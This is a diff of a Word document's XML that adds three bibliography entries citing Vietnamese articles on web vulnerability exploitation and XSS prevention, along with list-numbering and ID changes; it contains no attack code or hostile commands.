-      <w:bookmarkEnd w:id="48"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21214,6 +26462,78 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[18]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1).” Accessed: Oct. 05, 2025. [Online]. Available: https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[19]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>V. IDC, “XSS là gì? Cách kiểm tra và ngăn chặn tấn công hiệu quả,” viettelidc.com.vn. Accessed: Oct. 05, 2025. [Online]. Available: https://viettelidc.com.vn/tin-tuc/xss-la-gi-cach-kiem-tra-va-ngan-chan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[20]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“Kỹ Thuật Tấn Công XSS và Cách Ngăn Chặn - Viblo.” Accessed: Oct. 05, 2025. [Online]. Available: https://viblo.asia/p/ky-thuat-tan-cong-xss-va-cach-ngan-chan-YWOZr0Py5Q0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21253,7 +26573,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId23" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -21373,7 +26693,7 @@
         <w:sz w:val="26"/>
         <w:szCs w:val="26"/>
       </w:rPr>
-      <w:t>17</w:t>
+      <w:t>29</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -21818,6 +27138,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2D07143D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="26B0A122"/>
+    <w:lvl w:ilvl="0" w:tplc="7C6CC4F2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1584" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2304" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3024" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3744" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4464" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="5184" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5904" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6624" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7344" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="39B76FB9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FD3451FC"/>
@@ -21906,7 +27315,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63230E1A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CB7E34CA"/>
@@ -21995,7 +27404,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63586923"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="69D6B490"/>
@@ -22118,7 +27527,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63C95BDB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="58066950"/>
@@ -22231,7 +27640,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7EBB0DC0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3C3C2CB6"/>
@@ -22322,13 +27731,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
@@ -22337,15 +27746,18 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="9">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="10">
     <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
@@ -23807,7 +29219,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{22C64A6F-C59C-4DCE-9B40-639E86C84E3E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3B48EF6D-E034-4D0D-9E10-FA810C3CAEAA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
